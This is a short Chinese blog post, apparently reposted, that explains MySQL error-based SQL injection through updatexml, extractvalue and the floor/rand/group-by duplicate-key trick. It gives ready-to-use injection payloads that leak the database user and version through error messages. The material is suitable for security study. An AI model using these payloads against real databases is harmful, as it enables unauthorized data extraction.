码迷,mamicode.com
首页 > 数据库 > 详细

mysql报错注入函数

时间:2020-04-27 19:48:29      阅读:91      评论:0      收藏:0      [点我收藏+]

标签:png   图片   version   https   com   ble   upd   需要   添加   

xpath处理函数报错注入:

updatexml(xml_doc,xpath,new_value)

利用xpath把xml文档中的指定字符串替换成新值。

and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

技术图片

 

extractvalue(xml_doc, xpath)

从指定xml文档中查询指定的字符串。

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

技术图片

 

参数xpath需要的是xpath格式的字符串,不是就会报错,sql语句由内向外执行报错得到查询的信息

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,所以MySQL 5.1.5版本以下的不能上述函数进行报错注入。

上述报错注入函数有字符限制,最长32位。

虚拟表主键重复报错注入:

floor() + rand() + group by

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));

技术图片

原理参考链接:https://www.2cto.com/article/201604/498394.html

group by key (key为虚拟表的主键)

循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据

mysql报错注入函数

标签:png   图片   version   https   com   ble   upd   需要   添加   

原文地址:https://www.cnblogs.com/123456ZJJ/p/12788631.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!